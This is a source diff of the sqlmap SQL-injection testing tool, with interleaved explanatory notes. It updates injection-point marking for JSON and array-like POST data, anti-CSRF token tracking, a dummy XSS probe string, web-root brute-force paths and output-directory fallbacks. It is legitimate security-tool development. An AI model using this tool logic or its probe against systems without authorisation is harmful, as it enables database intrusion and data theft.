@@ -480,7 +495,7 @@ HASHDB_FLUSH_RETRIES = 3
 HASHDB_END_TRANSACTION_RETRIES = 3

 # Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
-HASHDB_MILESTONE_VALUE = "nXkbwIURlN" # rd74b803 "".join(random.sample(string.ascii_letters, 10))
+HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10))

 # Warn user of possible delay due to large page dump in full UNION query injections
 LARGE_OUTPUT_THRESHOLD = 1024 ** 2

@@ -504,7 +519,10 @@ MAX_DNS_LABEL = 63
 DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)

 # Alphabet used for heuristic checks
-HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
+HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')

+# String used for dummy XSS check of a tested parameter value
+DUMMY_XSS_CHECK_APPENDIX = "<'\">"

 # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024

@@ -528,7 +546,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
 CHECK_ZERO_COLUMNS_THRESHOLD = 10

 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
+BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved")

 # Generic www root directory names
 GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")

@@ -540,7 +558,7 @@ MAX_HELP_OPTION_LENGTH = 18
 MAX_CONNECT_RETRIES = 100

 # Strings for detecting formatting errors
-FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
+FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")

 # Regular expression used for extracting ASP.NET view state values
 VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'

@@ -566,6 +584,9 @@ JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+)
 # Regular expression used for detecting multipart POST data
 MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="

+# Regular expression used for detecting Array-like POST data
+ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)

 # Default POST data content-type
 DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"

@@ -581,15 +602,27 @@ MIN_BINARY_DISK_DUMP_SIZE = 100
 # Regular expression used for extracting form tags
 FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"

+# Maximum number of lines to save in history file
+MAX_HISTORY_LENGTH = 1000

 # Minimum field entry length needed for encoded content (hex, base64,...) check
 MIN_ENCODED_LEN_CHECK = 5

 # Timeout in seconds in which Metasploit remote session has to be initialized
 METASPLOIT_SESSION_TIMEOUT = 300

+# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html
+LOBLKSIZE = 2048

+# Suffix used to mark variables having keyword names
+EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"

 # Reference: http://www.cookiecentral.com/faq/#3.5
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."

+# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
+CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")

 # Prefixes used in brute force search for web server document root
 BRUTE_DOC_ROOT_PREFIXES = {
 OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),

@@ -605,6 +638,9 @@ BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
 # Character used as a boundary in kb.chars (preferably less frequent letter)
 KB_CHARS_BOUNDARY_CHAR = 'q'

+# Letters of lower frequency used in kb.chars
+KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"

 # CSS style used in HTML dump format
 HTML_DUMP_CSS_STYLE = """<style>
 table{
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -13,14 +13,60 @@ from lib.core import readlineng as readline
 from lib.core.common import Backend
 from lib.core.data import logger
 from lib.core.data import paths
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import OS
+from lib.core.settings import MAX_HISTORY_LENGTH

-def saveHistory():
-historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
+def readlineAvailable():
+"""
+Check if the readline is available. By default
+it is not in Python default installation on Windows
+"""

+return readline._readline is not None

+def clearHistory():
+if not readlineAvailable():
+return

+readline.clear_history()

+def saveHistory(completion=None):
+if not readlineAvailable():
+return

+if completion == AUTOCOMPLETE_TYPE.SQL:
+historyPath = paths.SQL_SHELL_HISTORY
+elif completion == AUTOCOMPLETE_TYPE.OS:
+historyPath = paths.OS_SHELL_HISTORY
+else:
+historyPath = paths.SQLMAP_SHELL_HISTORY

+try:
+with open(historyPath, "w+"):
+pass
+except:
+pass

+readline.set_history_length(MAX_HISTORY_LENGTH)
+try:
 readline.write_history_file(historyPath)
+except IOError, msg:
+warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg)
+logger.warn(warnMsg)

-def loadHistory():
-historyPath = os.path.expanduser(paths.SQLMAP_HISTORY)
+def loadHistory(completion=None):
+if not readlineAvailable():
+return

+clearHistory()

+if completion == AUTOCOMPLETE_TYPE.SQL:
+historyPath = paths.SQL_SHELL_HISTORY
+elif completion == AUTOCOMPLETE_TYPE.OS:
+historyPath = paths.OS_SHELL_HISTORY
+else:
+historyPath = paths.SQLMAP_SHELL_HISTORY

 if os.path.exists(historyPath):
 try:
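Note: the rewritten shell helpers keep one readline history file per shell type (sqlmap shell, SQL shell, OS shell) and cap it at MAX_HISTORY_LENGTH. A minimal standalone sketch of the same load/save pattern (the path is illustrative; the readline module is not available in a default Python installation on Windows):

import atexit
import os
import readline

def attach_history(path, max_length=1000):
    # Load any existing history, cap its size and save it back on interpreter exit
    if os.path.exists(path):
        readline.read_history_file(path)
    readline.set_history_length(max_length)
    atexit.register(readline.write_history_file, path)

attach_history(os.path.expanduser("~/.demo_sql_shell_history"))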
@@ -47,14 +93,12 @@ class CompleterNG(rlcompleter.Completer):

 return matches

-def autoCompletion(sqlShell=False, osShell=False):
-# First of all we check if the readline is available, by default
-# it is not in Python default installation on Windows
-if not readline._readline:
+def autoCompletion(completion=None, os=None, commands=None):
+if not readlineAvailable():
 return

-if osShell:
-if Backend.isOs(OS.WINDOWS):
+if completion == AUTOCOMPLETE_TYPE.OS:
+if os == OS.WINDOWS:
 # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
 completer = CompleterNG({
 "copy": None, "del": None, "dir": None,

@@ -75,5 +119,11 @@ def autoCompletion(sqlShell=False, osShell=False):
 readline.set_completer(completer.complete)
 readline.parse_and_bind("tab: complete")

-loadHistory()
-atexit.register(saveHistory)
+elif commands:
+completer = CompleterNG(dict(((_, None) for _ in commands)))
+readline.set_completer_delims(' ')
+readline.set_completer(completer.complete)
+readline.parse_and_bind("tab: complete")

+loadHistory(completion)
+atexit.register(saveHistory, completion)

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -17,6 +17,8 @@ from lib.core.common import Backend
 from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import intersect
+from lib.core.common import normalizeUnicode
+from lib.core.common import openFile
 from lib.core.common import paramToDict
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar

@@ -38,13 +40,17 @@ from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapMissingPrivileges
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import _setDBMS
 from lib.core.option import _setKnowledgeBaseAttributes
 from lib.core.option import _setAuthCred
 from lib.core.settings import ASTERISK_MARKER
+from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import HOST_ALIASES
+from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
 from lib.core.settings import JSON_RECOGNITION_REGEX
 from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
 from lib.core.settings import MULTIPART_RECOGNITION_REGEX

@@ -91,6 +97,7 @@ def _setRequestParams():

 if conf.data is not None:
 conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
+hintNames = []

 def process(match, repl):
 retVal = match.group(0)

@@ -103,7 +110,8 @@ def _setRequestParams():
 retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
 else:
 break
+if CUSTOM_INJECTION_MARK_CHAR in retVal:
+hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
 return retVal

 if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:

@@ -115,6 +123,9 @@ def _setRequestParams():
 else:
 kb.processUserMarks = not test or test[0] not in ("n", "N")

+if kb.processUserMarks:
+kb.testOnlyCustom = True

 if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
 if re.search(JSON_RECOGNITION_REGEX, conf.data):
 message = "JSON data found in %s data. " % conf.method

@@ -126,6 +137,12 @@ def _setRequestParams():
 conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
 conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
 conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
+match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
+if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
+_ = match.group(2)
+_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
+_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
+conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
 kb.postHint = POST_HINT.JSON

 elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
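Note: the added lines extend JSON processing so that string and numeric values inside a JSON array also receive the custom injection mark. A self-contained replay of those three regex steps on a made-up payload:

import re

CUSTOM_INJECTION_MARK_CHAR = '*'
data = '{"id": 1, "tags": ["alpha", 7]}'

# Find a JSON array value and mark the strings and numbers inside it
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', data)
if match:
    inner = match.group(2)
    inner = re.sub(r'("[^"]+)"', r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, inner)
    inner = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, inner)
    data = data.replace(match.group(0), match.group(0).replace(match.group(2), inner))

print(data)  # {"id": 1, "tags": ["alpha*", 7*]}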
@@ -140,6 +157,17 @@ def _setRequestParams():
 conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
 kb.postHint = POST_HINT.JSON_LIKE

+elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
+message = "Array-like data found in %s data. " % conf.method
+message += "Do you want to process it? [Y/n/q] "
+test = readInput(message, default="Y")
+if test and test[0] in ("q", "Q"):
+raise SqlmapUserQuitException
+elif test[0] not in ("n", "N"):
+conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
+conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
+kb.postHint = POST_HINT.ARRAY_LIKE

 elif re.search(XML_RECOGNITION_REGEX, conf.data):
 message = "SOAP/XML data found in %s data. " % conf.method
 message += "Do you want to process it? [Y/n/q] "
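Note: the new branch recognizes PHP-style array parameters (name[]=...) and appends the injection mark after every value. The recognition and marking steps, replayed on a sample request body:

import re

DEFAULT_GET_POST_DELIMITER = '&'
CUSTOM_INJECTION_MARK_CHAR = '*'
ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)

data = "id[]=1&id[]=2&name=foo"
if re.search(ARRAY_LIKE_RECOGNITION_REGEX, data):
    # Append the mark after every parameter value, as the new branch does
    data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, data)

print(data)  # id[]=1*&id[]=2*&name=foo*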
@@ -152,7 +180,7 @@ def _setRequestParams():
 kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML

 elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
-message = "Multipart like data found in %s data. " % conf.method
+message = "Multipart-like data found in %s data. " % conf.method
 message += "Do you want to process it? [Y/n/q] "
 test = readInput(message, default="Y")
 if test and test[0] in ("q", "Q"):

@@ -180,7 +208,7 @@ def _setRequestParams():

 kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks

-if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or ""):
+if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
 warnMsg = "you've provided target URL without any GET "
 warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
 warnMsg += "and without providing any POST parameters "

@@ -210,6 +238,15 @@ def _setRequestParams():
 else:
 kb.processUserMarks = not test or test[0] not in ("n", "N")

+if kb.processUserMarks:
+kb.testOnlyCustom = True

+if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
+warnMsg = "it seems that you've provided empty parameter value(s) "
+warnMsg += "for testing. Please, always use only valid parameter values "
+warnMsg += "so sqlmap could be able to run properly"
+logger.warn(warnMsg)

 if not kb.processUserMarks:
 if place == PLACE.URI:
 query = urlparse.urlsplit(value).query

@@ -245,7 +282,15 @@ def _setRequestParams():
 parts = value.split(CUSTOM_INJECTION_MARK_CHAR)

 for i in xrange(len(parts) - 1):
-conf.paramDict[place]["%s#%d%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
+name = None
+if kb.postHint:
+for ending, _ in hintNames:
+if parts[i].endswith(ending):
+name = "%s %s" % (kb.postHint, _)
+break
+if name is None:
+name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
+conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))

 if place == PLACE.URI and PLACE.GET in conf.paramDict:
 del conf.paramDict[PLACE.GET]
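Note: thanks to the hintNames list collected earlier, a custom injection point inside JSON-style POST data can now be reported by the field it belongs to (e.g. "JSON username") instead of only a positional label. A compact sketch of that lookup (all sample values are made up, and the fallback label format is simplified):

CUSTOM_INJECTION_MARK_CHAR = '*'
POST_HINT = "JSON"
data = '{"username": "admin*", "age": 7*}'
# (ending, field-name) pairs collected while the marks were being inserted
hint_names = [('"username": "admin', "username"), ('"age": 7', "age")]

parts = data.split(CUSTOM_INJECTION_MARK_CHAR)
for i in range(len(parts) - 1):
    # Prefer a field-based name, fall back to a positional one
    name = next(("%s %s" % (POST_HINT, field) for ending, field in hint_names if parts[i].endswith(ending)),
                "%s #%d%s" % (POST_HINT, i + 1, CUSTOM_INJECTION_MARK_CHAR))
    print(name)  # JSON username, then JSON age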
@@ -313,6 +358,22 @@ def _setRequestParams():
 errMsg += "within the given request data"
 raise SqlmapGenericException(errMsg)

+if conf.csrfToken:
+if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
+errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
+errMsg += "found in provided GET, POST, Cookie or header values"
+raise SqlmapGenericException(errMsg)
+else:
+for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+for parameter in conf.paramDict.get(place, {}):
+if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
+message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
+message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
+test = readInput(message, default="N")
+if test and test[0] in ("y", "Y"):
+conf.csrfToken = parameter
+break

 def _setHashDB():
 """
 Check and set the HashDB SQLite file for query resume functionality.
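Note: when --csrf-token is not given, the new code scans GET/POST/Cookie parameter names for the infixes in CSRF_TOKEN_PARAMETER_INFIXES and offers to track the matching parameter. The detection itself reduces to a case-insensitive substring test:

CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")

def looks_like_csrf_token(parameter):
    # Case-insensitive infix match on the parameter name
    return any(infix in parameter.lower() for infix in CSRF_TOKEN_PARAMETER_INFIXES)

print(looks_like_csrf_token("csrfmiddlewaretoken"))  # True
print(looks_like_csrf_token("X-XSRF-TOKEN"))         # True
print(looks_like_csrf_token("sessionid"))            # False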
@@ -448,7 +509,22 @@ def _setResultsFile():

 if not conf.resultsFP:
 conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
-conf.resultsFP = codecs.open(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+try:
+conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+except (OSError, IOError), ex:
+try:
+warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
+conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1]
+conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
+warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
+logger.warn(warnMsg)
+except IOError, _:
+errMsg = "unable to write to the temporary directory ('%s'). " % _
+errMsg += "Please make sure that your disk is not full and "
+errMsg += "that you have sufficient write permissions to "
+errMsg += "create temporary files and/or directories"
+raise SqlmapSystemException(errMsg)

 conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)

 logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
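Note: instead of crashing when the CSV results file cannot be created, the code now falls back to a temporary file and only gives up if even that fails. The same two-step fallback in isolation (function name and prefix are illustrative):

import os
import tempfile

def open_results_file(preferred_path):
    # Prefer the configured location, otherwise fall back to a temporary CSV file
    try:
        return preferred_path, open(preferred_path, "w+b")
    except (OSError, IOError):
        fd, path = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")
        return path, os.fdopen(fd, "w+b")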
|
@ -469,7 +545,7 @@ def _createFilesDir():
|
||||||
except OSError, ex:
|
except OSError, ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
||||||
warnMsg = "unable to create files directory "
|
warnMsg = "unable to create files directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.filePath, ex)
|
warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
@ -491,7 +567,7 @@ def _createDumpDir():
|
||||||
except OSError, ex:
|
except OSError, ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
||||||
warnMsg = "unable to create dump directory "
|
warnMsg = "unable to create dump directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.dumpPath, ex)
|
warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
@ -516,25 +592,41 @@ def _createTargetDirs():
|
||||||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
||||||
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
except OSError, ex:
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||||
|
except Exception, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
warnMsg = "unable to create regular output directory "
|
warnMsg = "unable to create regular output directory "
|
||||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
|
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
paths.SQLMAP_OUTPUT_PATH = tempDir
|
||||||
|
|
||||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), getUnicode(conf.hostname))
|
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||||
|
|
||||||
if not os.path.isdir(conf.outputPath):
|
if not os.path.isdir(conf.outputPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(conf.outputPath, 0755)
|
os.makedirs(conf.outputPath, 0755)
|
||||||
except OSError, ex:
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||||
|
except Exception, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
warnMsg = "unable to create output directory "
|
warnMsg = "unable to create output directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
|
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
|
||||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
conf.outputPath = tempDir
|
conf.outputPath = tempDir
|
||||||

@@ -544,9 +636,9 @@ def _createTargetDirs():
 f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
 f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
 if conf.data:
-f.write("\n\n%s" % conf.data)
+f.write("\n\n%s" % getUnicode(conf.data))
 except IOError, ex:
-if "denied" in str(ex):
+if "denied" in getUnicode(ex):
 errMsg = "you don't have enough permissions "
 else:
 errMsg = "something went wrong while trying "

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -285,7 +285,7 @@ def runCase(parse):
 elif result is False: # this means no SQL injection has been detected - if None, ignore
 retVal = False

-console = getUnicode(console, system=True)
+console = getUnicode(console, encoding=sys.stdin.encoding)

 if parse and retVal:
 with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -106,20 +106,25 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
 kb.threadContinue = True
 kb.threadException = False

-if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)):
+if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
 while True:
 message = "please enter number of threads? [Enter for %d (current)] " % numThreads
 choice = readInput(message, default=str(numThreads))
-if choice and choice.isdigit():
+if choice:
-if int(choice) > MAX_NUMBER_OF_THREADS:
+skipThreadCheck = False
+if choice.endswith('!'):
+choice = choice[:-1]
+skipThreadCheck = True
+if choice.isdigit():
+if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck:
 errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
 logger.critical(errMsg)
 else:
-numThreads = int(choice)
+conf.threads = numThreads = int(choice)
 break

 if numThreads == 1:
-warnMsg = "running in a single-thread mode. This could take a while."
+warnMsg = "running in a single-thread mode. This could take a while"
 logger.warn(warnMsg)

 try:
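
The prompt logic above lets a trailing '!' bypass the soft thread cap. Roughly, as an illustrative sketch (not the exact sqlmap code):

    MAX_NUMBER_OF_THREADS = 10  # illustrative cap

    def parse_thread_choice(choice, current):
        # A trailing '!' means "I know what I am doing" and skips the cap check.
        skip_check = choice.endswith('!')
        if skip_check:
            choice = choice[:-1]
        if not choice.isdigit():
            return current
        value = int(choice)
        if value > MAX_NUMBER_OF_THREADS and not skip_check:
            return current  # keep the previous value instead of exceeding the cap
        return value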

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -41,7 +41,7 @@ def update():
 logger.debug(debugMsg)

 dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
-process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
